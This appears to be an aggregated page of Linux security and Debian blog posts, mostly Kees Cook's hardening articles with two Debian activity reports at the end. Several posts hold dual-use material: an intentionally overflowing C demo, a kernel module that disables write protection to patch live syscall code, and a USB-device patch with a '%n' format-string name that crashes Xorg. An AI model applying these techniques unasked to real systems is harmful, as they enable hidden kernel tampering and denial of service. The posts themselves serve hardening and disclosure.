Search Results: "kees"

27 January 2014

Kees Cook: -fstack-protector-strong

There will be a new option in gcc 4.9 named -fstack-protector-strong , which offers an improved version of -fstack-protector without going all the way to -fstack-protector-all . The stack protector feature itself adds a known canary to the stack during function preamble, and checks it when the function returns. If it changed, there was a stack overflow, and the program aborts. This is fine, but figuring out when to include it is the reason behind the various options. Since traditionally stack overflows happen with string-based manipulations, the default (-fstack-protector), only includes the canary code when a function defines an 8 (--param=ssp-buffer-size=N, N=8 by default) or more byte local character array. This means just a few functions get the checking, but they re probably the most likely to need it, so it s an okay balance. Various distributions ended up lowering their default --param=ssp-buffer-size option down to 4, since there were still cases of functions that should have been protected but the conservative gcc upstream default of 8 wasn t covering them. However, even with the increased function coverage, there are rare cases when a stack overflow happens on other kinds of stack variables. To handle this more paranoid concern, -fstack-protector-all was defined to add the canary to all functions. This results in substantial use of stack space for saving the canary on deep stack users, and measurable (though surprisingly still relatively low) performance hit due to all the saving/checking. For a long time, Chrome OS used this, since we re paranoid. :) In the interest of gaining back some of the lost performance and not hitting our Chrome OS build images with such a giant stack-protector hammer, Han Shen from the Chrome OS compiler team created the new option -fstack-protector-strong, which enables the canary in many more conditions: This meant we were covering all the more paranoid conditions that might lead to a stack overflow. Chrome OS has been using this option instead of -fstack-protector-all for about 10 months now. As a quick demonstration of the options, you can see this example program under various conditions. It tries to show off an example of shoving serialized data into a non-character variable, like might happen in some network address manipulations or streaming data parsing. Since I m using memcpy here for clarity, the builds will need to turn off FORTIFY_SOURCE, which would also notice the overflow.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
struct no_chars  
    unsigned int len;
    unsigned int data;
 ;
int main(int argc, char * argv[])
 
    struct no_chars info =    ;
    if (argc < 3)  
        fprintf(stderr, "Usage: %s LENGTH DATA...\n", argv[0]);
        return 1;
     
    info.len = atoi(argv[1]);
    memcpy(&info.data, argv[2], info.len);
    return 0;
 
Built with everything disabled, this faults trying to return to an invalid VMA: Built with FORTIFY_SOURCE enabled, we see the expected catch of the overflow in memcpy: So, we ll leave FORTIFY_SOURCE disabled for our comparisons. With pre-4.9 gcc, we can see that -fstack-protector does not get triggered to protect this function: However, using -fstack-protector-all does trigger the protection, as expected: And finally, using the gcc snapshot of 4.9, here is -fstack-protector-strong doing its job: For Linux 3.14, I ve added support for -fstack-protector-strong via the new CONFIG_CC_STACKPROTECTOR_STRONG option. The old CONFIG_CC_STACKPROTECTOR will be available as CONFIG_CC_STACKPROTECTOR_REGULAR. When comparing the results on builds via size and objdump -d analysis, here s what I found with gcc 4.9: A normal x86_64 defconfig build, without stack protector had a kernel text size of 11430641 bytes with 36110 function bodies. Adding CONFIG_CC_STACKPROTECTOR_REGULAR increased the kernel text size to 11468490 (a +0.33% change), with 1015 of 36110 functions stack-protected (2.81%). Using CONFIG_CC_STACKPROTECTOR_STRONG increased the kernel text size to 11692790 (+2.24%), with 7401 of 36110 functions stack-protected (20.5%). And 20% is a far-cry from 100% if support for -fstack-protector-all was added back to the kernel. The next bit of work will be figuring out the best way to detect the version of gcc in use when doing Debian package builds, and using -fstack-protector-strong instead of -fstack-protector. For Ubuntu, it s much simpler because it ll just be the compiler default.

2014, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

21 December 2013

Kees Cook: DOM scraping

For a long time now I ve used mechanize (via either Perl or Python) for doing website interaction automation. Stuff like playing web games, checking the weather, or reviewing my balance at the bank. However, as the use of javascript continues to increase, it s getting harder and harder to screen-scrape without actually processing DOM events. To do that, really only browsers are doing the right thing, so getting attached to an actual browser DOM is generally the only way to do any kind of web interaction automation. It seems the thing furthest along this path is Selenium. Initially, I spent some time trying to make it work with Firefox, but gave up. Instead, this seems to work nicely with Chrome via the Chrome WebDriver. And even better, all of this works out of the box on Ubuntu 13.10 via python-selenium and chromium-chromedriver. Running /usr/lib/chromium-browser/chromedriver2_server from chromium-chromedriver starts a network listener on port 9515. This is the WebDriver API that Selenium can talk to. When requests are made, chromedriver2_server spawns Chrome, and all the interactions happen against that browser. Since I prefer Python, I avoided the Java interfaces and focused on the Python bindings:
#!/usr/bin/env python
import sys
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
caps = webdriver.DesiredCapabilities.CHROME
browser = webdriver.Remote("http://localhost:9515", caps)
browser.get("https://bank.example.com/")
assert "My Bank" in browser.title
try:
    elem = browser.find_element_by_name("userid")
    elem.send_keys("username")
    elem = browser.find_element_by_name("password")
    elem.send_keys("wheee my password" + Keys.RETURN)
except NoSuchElementException:
    print "Could not find login elements"
    sys.exit(1)
assert "Account Balances" in browser.title
xpath = "//div[text()='Balance']/../../td[2]/div[contains(text(),'$')]"
balance = browser.find_element_by_xpath(xpath).text
print balance
browser.close()
This would work pretty great, but if you need to save any state between sessions, you ll want to be able to change where Chrome stores data (since by default in this configuration, it uses an empty temporary directory via --user-data-dir=). Happily, various things about the browser environment can be controlled, including the command line arguments. This is configurable by expanding the desired capabilities variable:
caps = webdriver.DesiredCapabilities.CHROME
caps["chromeOptions"] =  
        "args": ["--user-data-dir=/home/user/somewhere/to/store/your/session"],
     
A great thing about this is that you get to actually watch the browser do its work. However, in cases where this interaction is going to be fully automated, you likely won t have a Xorg session running, so you ll need to wrap the WebDriver in one (since it launches Chrome). I used Xvfb for this:
#!/bin/bash
# Start WebDriver under fake X and wait for it to be listening
xvfb-run /usr/lib/chromium-browser/chromedriver2_server &
pid=$!
while ! nc -q0 -w0 localhost 9515; do
    sleep 1
done
the-chrome-script
rc=$?
# Shut down WebDriver
kill $pid
exit $rc
Alternatively, all of this could be done in the python script too, but I figured it s easier to keep the support infrastructure separate from the actual test script itself. I actually leave the xvfb-run call external too, so it s easier to debug the browser in my own X session. One bug I encountered was that the WebDriver s cache of the browser s DOM can sometimes get out of sync with the actual browser s DOM. I didn t find a solution to this, but managed to work around it. I m hoping later versions fix this. :)

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10 December 2013

Kees Cook: live patching the kernel

A nice set of recent posts have done a great job detailing the remaining ways that a root user can get at kernel memory. Part of this is driven by the ideas behind UEFI Secure Boot, but they come from the same goal: making sure that the root user cannot directly subvert the running kernel. My perspective on this is toward making sure that an attacker who has gained access and then gained root privileges can t continue to elevate their access and install invisible kernel rootkits. An outline for possible attack vectors is spelled out by Matthew Gerrett s continuing useful kernel lockdown patch series. The set of attacks was examined by Tyler Borland in Bypassing modules_disabled security . His post describes each vector in detail, and he ultimately chooses MSR writing as the way to write kernel memory (and shows an example of how to re-enable module loading). One thing not mentioned is that many distros have MSR access as a module, and it s rarely loaded. If modules_disabled is already set, an attacker won t be able to load the MSR module to begin with. However, the other general-purpose vector, kexec, is still available. To prove out this method, Matthew wrote a proof-of-concept for changing kernel memory via kexec. Chrome OS is several steps ahead here, since it has hibernation disabled, MSR writing disabled, kexec disabled, modules verified, root filesystem read-only and verified, kernel verified, and firmware verified. But since not all my machines are Chrome OS, I wanted to look at some additional protections against kexec on general-purpose distro kernels that have CONFIG_KEXEC enabled, especially those without UEFI Secure Boot and Matthew s lockdown patch series. My goal was to disable kexec without needing to rebuild my entire kernel. For future kernels, I have proposed adding /proc/sys/kernel/kexec_disabled, a partner to the existing modules_disabled, that will one-way toggle kexec off. For existing kernels, things got more ugly. What options do I have for patching a running kernel? First I looked back at what I d done in the past with fixing vulnerabilities with systemtap. This ends up being a rather heavy-duty way to go about things, since you need all the distro kernel debug symbols, etc. It does work, but has a significant problem: since it uses kprobes, a root user can just turn off the probes, reverting the changes. So that s not going to work. Next I looked at ksplice. The original upstream has gone away, but there is still some work being done by Jiri Slaby. However, even with his updates which fixed various build problems, there were still more, even when building a 3.2 kernel (Ubuntu 12.04 LTS). So that s out too, which is too bad, since ksplice does exactly what I want: modifies the running kernel s functions via a module. So, finally, I decided to just do it by hand, and wrote a friendly kernel rootkit. Instead of dealing with flipping page table permissions on the normally-unwritable kernel code memory, I borrowed from PaX s KERNEXEC feature, and just turn off write protect checking on the CPU briefly to make the changes. The return values for functions on x86_64 are stored in RAX, so I just need to stuff the kexec_load syscall with mov -1, %rax; ret (-1 is EPERM):
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>
static unsigned long long_target;
static char *target;
module_param_named(syscall, long_target, ulong, 0644);
MODULE_PARM_DESC(syscall, "Address of syscall");
/* mov $-1, %rax; ret */
unsigned const char bytes[] =   0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
                                0xc3  ;
unsigned char *orig;
/* Borrowed from PaX KERNEXEC */
static inline void disable_wp(void)
 
        unsigned long cr0;
        preempt_disable();
        barrier();
        cr0 = read_cr0();
        cr0 &= ~X86_CR0_WP;
        write_cr0(cr0);
 
static inline void enable_wp(void)
 
        unsigned long cr0;
        cr0 = read_cr0();
        cr0  = X86_CR0_WP;
        write_cr0(cr0);
        barrier();
        preempt_enable_no_resched();
 
static int __init syscall_eperm_init(void)
 
        int i;
        target = (char *)long_target;
        if (target == NULL)
                return -EINVAL;
        /* save original */
        orig = kmalloc(sizeof(bytes), GFP_KERNEL);
        if (!orig)
                return -ENOMEM;
        for (i = 0; i < sizeof(bytes); i++)  
                orig[i] = target[i];
         
        pr_info("writing %lu bytes at %p\n", sizeof(bytes), target);
        disable_wp();
        for (i = 0; i < sizeof(bytes); i++)  
                target[i] = bytes[i];
         
        enable_wp();
        return 0;
 
module_init(syscall_eperm_init);
static void __exit syscall_eperm_exit(void)
 
        int i;
        pr_info("restoring %lu bytes at %p\n", sizeof(bytes), target);
        disable_wp();
        for (i = 0; i < sizeof(bytes); i++)  
                target[i] = orig[i];
         
        enable_wp();
        kfree(orig);
 
module_exit(syscall_eperm_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Kees Cook <kees@outflux.net>");
MODULE_DESCRIPTION("makes target syscall always return EPERM");
If I didn t want to leave an obvious indication that the kernel had been manipulated, the module could be changed to: And with this in place, it s just a matter of loading it with the address of sys_kexec_load (found via /proc/kallsyms) before I disable module loading via modprobe. Here s my upstart script:
# modules-disable - disable modules after rc scripts are done
#
description "disable loading modules"
start on stopped module-init-tools and stopped rc
task
script
        cd /root/modules/syscall_eperm
        make clean
        make
        insmod ./syscall_eperm.ko \
                syscall=0x$(egrep ' T sys_kexec_load$' /proc/kallsyms   cut -d" " -f1)
        modprobe disable
end script
And now I m safe from kexec before I have a kernel that contains /proc/sys/kernel/kexec_disabled.

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

27 November 2013

Kees Cook: Thanks UPS

My UPS has decided that every two weeks when it performs a self-test that my 116V mains power isn t good enough, so it drains the battery and shuts down my home network. Only took a month and a half for me to see on the network graphs that my outages were, to the minute, 2 weeks apart. :) APC Monitoring In theory, reducing the sensitivity will fix this

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

13 August 2013

Kees Cook: TPM providing /dev/hwrng

A while ago, I added support for the TPM s pRNG to the rng-tools package in Ubuntu. Since then, Kent Yoder added TPM support directly into the kernel s /dev/hwrng device. This means there s no need to carry the patch in rng-tools any more, since I can use /dev/hwrng directly now:
# modprobe tpm-rng
# echo tpm-rng >> /etc/modules
# grep -v ^# /etc/default/rng-tools
RNGDOPTIONS="--fill-watermark=90%"
# service rng-tools restart
And as before, once it s been running a while (or you send SIGUSR1 to rngd), you can see reporting in syslog:
# pkill -USR1 rngd
# tail -n 15 /var/log/syslog
Aug 13 09:51:01 linux rngd[39114]: stats: bits received from HRNG source: 260064
Aug 13 09:51:01 linux rngd[39114]: stats: bits sent to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: entropy added to kernel pool: 216384
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 successes: 13
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2 failures: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Monobit: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Poker: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Runs: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Long run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS 140-2(2001-10-10) Continuous run: 0
Aug 13 09:51:01 linux rngd[39114]: stats: HRNG source speed: (min=10.433; avg=10.442; max=10.454)Kibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: FIPS tests speed: (min=73.360; avg=75.504; max=86.305)Mibits/s
Aug 13 09:51:01 linux rngd[39114]: stats: Lowest ready-buffers level: 2
Aug 13 09:51:01 linux rngd[39114]: stats: Entropy starvations: 0
Aug 13 09:51:01 linux rngd[39114]: stats: Time spent starving for entropy: (min=0; avg=0.000; max=0)us
I m pondering getting this running in Chrome OS too, but I want to make sure it doesn t suck too much battery.

2013, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

1 October 2012

Kees Cook: Link restrictions released in Linux 3.6

It s been a very long time coming, but symlink and hardlink restrictions have finally landed in the mainline Linux kernel as of version 3.6. The protection is at least old enough to have a driver s license in most US states, with some of the first discussions I could find dating from Aug 1996. While this protection is old (to ancient) news for anyone running Chrome OS, Ubuntu, grsecurity, or OpenWall, I m extremely excited that is can now benefit everyone running Linux. All the way from cloud monstrosities to cell phones, an entire class of vulnerability just goes away. Thanks to everyone that had a part in developing, testing, reviewing, and encouraging these changes over the years. It s quite a relief to have it finally done. I hope I never have to include the year in my patch revision serial number again. :)

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

16 May 2012

Kees Cook: USB AVR fun

At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to %n . Recently a Chrome OS developer discovered that renaming his Bluetooth Keyboard to %n would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn t a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a normal (USB) keyboard. I borrowed a Maximus USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus. I added a rule for it to udev:
SUBSYSTEM=="usb", ACTION=="add", ATTR idVendor =="03eb", ATTR idProduct =="*", GROUP="plugdev"
installed the AVR tools:
sudo apt-get install dfu-programmer gcc-avr avr-libc
and pulled down the excellent LUFA USB tree:
git clone git://github.com/abcminiuser/lufa-lib.git
After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:
-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
...
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"
In fact, it was so successfully that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)
make dfu
After a reboot, I switched it back to programming mode by pressing and holding the H button, press/releasing the R button, and releasing H . The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:
echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default
Be careful of shared internal/external ports, and having two buses on one port, etc.

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

26 March 2012

Kees Cook: keeping your process unprivileged

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski. If you re not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a leaf node in the process tree, you can call PR_SET_NO_NEW_PRIVS (nnp) to make sure that the current process and its children can not gain new privileges (like through running a setuid binary). This produces some fun results, since things like the ping tool expect to gain enough privileges to open a raw socket. If you set nnp to 1 , suddenly that can t happen any more. Here s a quick example that sets nnp, and tries to run the command line arguments:
#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif
int main(int argc, char * argv[])
 
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))  
                perror("prctl(NO_NEW_PRIVS)");
                return 1;
         
        return execvp(argv[1], &argv[1]);
 
When it tries to run ping, the setuid-ness just gets ignored:
$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted
So, if your program has all the privs its going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

23 March 2012

Kees Cook: seccomp filter now in Ubuntu

With the generous help of the Ubuntu kernel team, Will Drewry s seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly. One of the questions I ve been asked by several people while they developed policy for earlier mode 2 seccomp implementations was How do I figure out which syscalls my program is going to need? To help answer this question, and to show a simple use of seccomp filter, I ve written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file ( seccomp-bpf.h ) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet. Read more in the seccomp filter tutorial. Enjoy!

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

15 February 2012

Kees Cook: discard, hole-punching, and TRIM

Under Linux, there are a number of related features around marking areas of a file, filesystem, or block device as no longer allocated . In the standard view, here s what happens if you fill a file to 500M and then truncate it to 100M, using the truncate syscall:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details to block device.
The important thing to note here is that in step 3 the block device has no idea about the released data blocks. The original contents of the file are actually still on the device. (And to a certain extent is why programs like shred exist.) While the recoverability of such released data is a whole other issue, the main problem about this lack of information for the block device is that some devices (like SSDs) could use this information to their benefit to help with extending their life, etc. To support this, the TRIM set of commands were created so that a block device could be informed when blocks were released. Under Linux, this is handled by the block device driver, and what the filesystem can pass down is discard intent, which is translated into the needed TRIM commands. So now, when discard notification is enabled for a filesystem (e.g. mount option discard for ext4), the earlier example looks like this:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details and sends discard intent to block device.
While SSDs can use discard to do fancy SSD things, there s another great use for discard, which is to restore sparseness to files. Normally, if you create a sparse file (open, seek to size, close), there was no way, after writing data to this file, to punch a hole back into it. The best that could be done was to just write zeros over the area, but that took up filesystem space. So, the ability to punch holes in files was added via the FALLOC_FL_PUNCH_HOLE option of fallocate. And when discard was enabled for a filesystem, these punched holes would get passed down to the block device as well. Take, for example, a qemu/KVM VM running on a disk image that was built from a sparse file. While inside the VM instance, the disk appears to be 10G. Externally, it might only have actually allocated 600M, since those are the only blocks that had been allocated so far. In the instance, if you wrote 8G worth of temporary data, and then deleted it, the underlying sparse file would have ballooned by 8G and stayed ballooned. With discard and hole punching, it s now possible for the filesystem in the VM to issue discards to the block driver, and then qemu could issue hole-punching requests to the sparse file backing the image, and all of that 8G would get freed again. The only down side is that each layer needs to correctly translate the requests into what the next layer needs. With Linux 3.1, dm-crypt supports passing discards from the filesystem above down to the block device under it (though this has cryptographic risks, so it is disabled by default). With Linux 3.2, the loopback block driver supports receiving discards and passing them down as hole-punches. That means that a stack like this works now: ext4, on dm-crypt, on loopback of a sparse file, on ext4, on SSD. If a file is deleted at the top, it ll pass all the way down, discarding allocated blocks all the way to the SSD: Set up a sparse backing file, loopback mount it, and create a dm-crypt device (with allow_discards ) on it:
# cd /root
# truncate -s10G test.block
# ls -lk test.block
-rw-r--r-- 1 root root 10485760 Feb 15 12:36 test.block
# du -sk test.block
0       test.block
# DEV=$(losetup -f --show /root/test.block)
# echo $DEV
/dev/loop0
# SIZE=$(blockdev --getsz $DEV)
# echo $SIZE
20971520
# KEY=$(echo -n "my secret passphrase"   sha256sum   awk ' print $1 ')
# echo $KEY
a7e845b0854294da9aa743b807cb67b19647c1195ea8120369f3d12c70468f29
# dmsetup create testenc --table "0 $SIZE crypt aes-cbc-essiv:sha256 $KEY 0 $DEV 0 1 allow_discards"
Now build an ext4 filesystem on it. This enables discard during mkfs, and disables lazy initialization so we can see the final size of the used space on the backing file without waiting for the background initialization at mount-time to finish, and mount it with the discard option:
# mkfs.ext4 -E discard,lazy_itable_init=0,lazy_journal_init=0 /dev/mapper/testenc
mke2fs 1.42-WIP (16-Oct-2011)
Discarding device blocks: done
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
655360 inodes, 2621440 blocks
131072 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=2684354560
80 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done 
# mount -o discard /dev/mapper/testenc /mnt
# sync; du -sk test.block
297708  test.block
Now, we create a 200M file, examine the backing file allocation, remove it, and compare the results:
# dd if=/dev/zero of=/mnt/blob bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 9.92789 s, 21.1 MB/s
# sync; du -sk test.block
502524  test.block
# rm /mnt/blob
# sync; du -sk test.block
297720  test.block
Nearly all the space was reclaimed after the file was deleted. Yay! Note that the Linux tmpfs filesystem does not yet support hole punching, so the exampe above wouldn t work if you tried it in a tmpfs-backed filesystem (e.g. /tmp on many systems).

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10 February 2012

Kees Cook: kvm and product_uuid

While looking for something to use as a system-unique fall-back when a TPM is not available, I looked at /sys/devices/virtual/dmi/id/product_uuid (same as dmidecode s System Information / UUID ), but was disappointed when, under KVM, the file was missing (and running dmidecode crashes KVM *cough*). However, after a quick check, I noticed that KVM supports the -uuid option to set the value of /sys/devices/virtual/dmi/id/product_uuid. Looks like libvirt supports this under capabilities / host / uuid in the XML, too.
host# kvm -uuid 12345678-ABCD-1234-ABCD-1234567890AB ...
host# ssh localhost ...
...
guest# cat /sys/devices/virtual/dmi/id/product_uuid
12345678-ABCD-1234-ABCD-1234567890AB

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

22 January 2012

Kees Cook: fixing vulnerabilities with systemtap

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily: Still, it s a cross-architecture local root escalation on most common installations. Don t stop reading just because you don t have a local user base attackers can use this to elevate privileges from your user, or from the web server s user, etc. Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you re waiting for your distribution s kernel update, you can use systemtap to change your kernel s running behavior. RedHat suggested this, and here s how to do it in Debian and Ubuntu: In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability. UPDATE: here s a systemtap script from Soren that doesn t require the full debug symbols. Sneaky, put can be rather slow since it hooks all writes in the system. :)

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

16 January 2012

Rapha&#235;l Hertzog: Review of my Debian related goals for 2011

Last year I shared my Debian related goals for 2011 . I tend to put more goals than what I can reasonably complete alone and this year was no exception. Let s have a look.
  1. Translate my Debian book into English: PARTLY DONE
    It took more time than expected to prepare and to run the fundraising campaign but it has been successful and the translation is happening right now.
  2. Finish multiarch support in dpkg: DONE BUT NOT ENTIRELY MERGED YET
    Yes, multiarch support was already in the pipe last year in January. I completed the development between January and April (it was sponsored by Linaro) and since then it has mostly been waiting on Guillem to review it, tweak it, and integrate it.
  3. Make deb files use XZ compression by default: TRIED BUT ABANDONED
    After discussing the issue with Colin Watson and Joey Hess during debconf, I came to the conclusion that it was not really desirable at this point. The objections were that debian-installer was not ready for it and that it adds a new dependency on xz for debootstrap to work on non-Debian systems. I believe that the debian-installer side is no longer a problem since unxz is built in busybox-udeb (since version 1:1.19.3-2). For the other side, there s not much to do except ensuring that xz is portable to all the other OS we care about. DAK has been updated too (see #556407).
  4. Be more reactive to review/merge dpkg patches: PARTLY DONE
    I don t think we had any patch that received zero input. We still have a backlog of patches, and the situation is far from ideal but the situation improved.
  5. Implement the rolling distribution proposed as part of the CUT project and try to improve the release process: NOT DONE
    We had a BoF during debconf, we discussed it at length on debian-devel, but in the end we did nothing out of it. Except Josselin Mouette who wrote a proof of concept for his idea. For me testing is already what people are expecting from a rolling distribution. It s just a matter of documenting how to effectively use testing, and of some marketing by defining rolling as alias to testing.
  6. Work more regularly on the developers-reference: PARTLY DONE
    I did contribute some new material to the document but not as much as I could have hoped. On the other hand, I have been rather reactive to ensure that sane patches got merged. We need more people writing new parts and updating the existing content.
  7. Write a 10-lesson course called Smart Package Management : NOT DONE
  8. Create an information product (most likely an ebook or an online training) and sell it on my blog: NOT DONE
    This was supposed to happen after the translation of the Debian Administrator s Handbook. Since the translation is not yet over, I did not start to work on this yet.
  9. By the end of the year, have at least 1/3 of my time funded by donations and/or earnings of my information products: NOT REACHED
    My target was rather aggressive with 700 each month, and given that I did not manage to complete any information product, I m already very pleased to have achieved a mean amount of 204 of donations each month (min: 91 , max: 364 ). It s more than two times better than in 2010. Thank you! Note that those figures do not take into account the revenues of the fundraising of the Debian Administrator s Handbook since they will be used for its translation.
That makes quite a lot of red (for things that I did not achieve) on the other hand I completed projects that I did not foresee and did not plan. For instance improving dpkg-buildflags and then merging Kees Cook work on hardened build flags was an important step for Debian. This was waiting for so long already

2 comments Liked this article? Click here. My blog is Flattr-enabled.

3 January 2012

Rapha&#235;l Hertzog: My Debian Activities in December 2011

This is my monthly summary of my Debian related activities. If you re among the people who made a donation to support my work (364.18 , thanks everybody!), then you can learn how I spent your money. Otherwise it s just an interesting status update on my various projects. Dpkg and Multiarch I had some hope to have a multiarch-enabled dpkg in sid for Christmas as Guillem told me that it was realistic. Alas Guillem got sick. We re in January and we re still not there. While some of Guillem s commits in December were related to multi-arch, the size of his pu/multiarch/master branch did not really shrink. We still have 36 commits to merge most of the work he did was refactoring some parts of the code that were already merged. And he initiated some discussion on interface changes. I participated to those discussions hoping to bring them to a quick resolution. I m still maintaining my own pu/multiarch/full branch, it is based on Guillem s branch but with further fixes that I developed and that he has not yet merged and with a change reverted (Guillem s branch allows crossgrading packages between different architectures while dpkg does not manage this correctly yet). I can only hope that January will be the last month of this never-ending saga. It s been one year since I started working on this project. :- Misc dpkg work I reviewed (and later merged) a patch of Kees Cook to enhance dpkg-buildflags so that it can report which hardening features are enabled. This feature might then be used by tools like lintian to detect missing hardening features. I mentored Gianluca Ciccarelli who is trying to enhance dpkg-maintscript-helper to take care of replacing a directory by a symlink and vice-versa. I took care of #651993 so that dpkg-mergechangelogs doesn t fail when it encounters an invalid version in the changelog, and of #652414 so that dpkg-source --commit accepts a relative filename when a patch file is explicitly given. Guillem also merged a fix I developed for LP#369898. Packaging work WordPress 3.3 came out so I immediately packaged it. Despite my upstream bug report, they did not update their GPL compliance page which offers the corresponding sources for what s bundled in the tarball. So I hunted for the required sources myself, and bundled them in the debian.tar.xz of the Debian source package. It s a rather crude solution but this allowed me to close the release critical bug #646729 and to reintroduce the Flash files that were dropped in the past which is great since the Flash-based file uploader is nicer than the one using the browser s file field. Quilt 0.50 came out after 2 years of (slow) development. The Debian package has many patches and several of them had to be updated to cope with the new upstream release. Fortunately some of them were also merged upstream. It still took an entire morning to complete this update. I also converted the packaging from CDBS to dh with a short rules file. Zim 0.54 came out and I immediately updated the package since it fixed a bug that was annoying me. Review of the ledgersmb packaging As the sql-ledger maintainer (and a user of this software for my accounting), I have been hoping to get ledgersmb packaged as a possible replacement for it. I have been following the various efforts initiated over time but none of them resulted in a real package in Debian. This is a real pity so I tried to fix this by offering to sponsor package uploads. That s why I did a first review of the packaging. It took several hours because you have to explain everything that s not good enough. I also filed a wishlist bug against lintian (#652963) to suggest that lintian should detect improper usage of dpkg-statoverride (this is a mistake that was present in the package that I reviewed). nautilus-dropbox work I wanted to polish the package in time for the Ubuntu LTS release and since Debian Import Freeze is in January, I implemented some of the important fixes that I wanted. The Debian package diverges from upstream in that the non-free binaries are installed in /var/lib/dropbox/ instead of $HOME.
